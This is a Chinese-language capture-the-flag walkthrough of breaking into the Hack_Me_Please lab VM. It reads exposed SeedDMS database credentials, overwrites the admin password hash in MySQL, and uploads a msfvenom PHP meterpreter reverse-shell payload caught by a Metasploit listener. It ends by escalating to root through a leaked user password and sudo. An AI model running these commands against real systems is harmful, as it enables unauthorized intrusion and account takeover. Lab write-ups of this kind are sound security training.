Hack_Me_Please靶机渗透过程
准备环境
攻击机:WSL-Kali-Linux
目标靶机:Hack_Me_Please
平台:VMware Workstation 16.2
靶机为NAT
模式
一、信息搜集
1.主机嗅探
VMware
这边直接显示靶机的IP
了,这边就懒得去进行主机嗅探了
2.端口扫描
对靶机进行端口扫描
nmap -A -p- 192.168.9.128
由扫描结果可知。该靶机已开放如下端口
端口 | 服务 | 版本 |
---|---|---|
80 | http Apache(Ubuntu) | 2.4.41 |
3306 | Mysql | 8.0.25 |
33060 | Mysqlx | / |
可见,22
端口处于关闭状态
3.访问其web页面
经过一番操作并没有发现网页上有任何可用信息
通过目录扫描也没发现特别之处
查看其源码,从js
下手,终于在第384
行发现main.js
文件,也就是该靶机入手的关键
点击访问该js
文件,就在下边不远处,发现一个关键点
发现是一个seeddms
的文件管理系统,且其版本号为5.1.22
二、漏洞挖掘
1.寻找程序漏洞
通过Google该管理系统,能够看到其程序源码
源码目录下有个名为conf
的文件夹,里面有个名为settings.xml
的配置文件
尝试访问靶机的settings.xml
文件
http://192.168.9.128/seeddms51x/conf/settings.xml
发现网站程序绝对路径
发现网站数据库用户名和密码
用户名为seeddms
,密码为seeddms
2.对seeddms主程序进行目录扫描
dirsearch -u http://192.168.9.128/seeddms51x/seeddms-5.1.22/
发现登录页面
三、漏洞利用
1.连接目标数据库
mysql -h 192.168.9.128 -useeddms -p
查看所有数据库
show databases;
存在seeddms
数据库,列出其包含的所有表
show tables;
发现几个可疑表:tblDocumentContent
,tblUsers
,users
先查看tblUsers
里面的内容
select * from tblUsers;
有用户admin
和被md5
加密的密码,可以对admin
的密码强制更改为md5
加密后的123456
,以达到完成对admin
密码的更改的目的,123456
进行md5
加密之后为e10adc3949ba59abbe56e057f20f883e
update seeddms.tblUsers set pwd = 'e10adc3949ba59abbe56e057f20f883e' where id =1;
2.后台登陆
可以去后台使用admin
和123456完
成登录
可以看到有上传入口,该版本含有文件上传漏洞
使用msf
生成木马上传
msfvenom -p php/meterpreter_reverse_tcp lhost=172.20.236.69 lport=9999 -e -f raw > 1.php
对该木马进行上传
查看该木马文件的物理路径
select * from tblDocumentContent;
在4/
目录下,访问该木马文件
3.反弹shell
同时启动监听
# 使用监听模块
use exploit/multi/handler
# 设置本地监听服务器
set lhost 172.20.224.58
# 设置本地监听端口
set lport 9999
# 设置监听有效载荷
set patload php/meterpreter_reverse_tcp
# 查看配置信息
show options
# 运行
run
进入shell
并设置回显
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看home
目录下有哪些用户
ls -lha /home
发现只有saket
用户,回想起刚才数据库中的users
表,查看users
表里面的内容
猜测这就是用户saket
的密码,进行测试
su saket
Saket@#$1337
成功登录saket
用户,查看其权限
sudo -l
用户能以root
身份执行所有命令,可以直接免密切换为root
账户
sudo su
成功拿到root
用户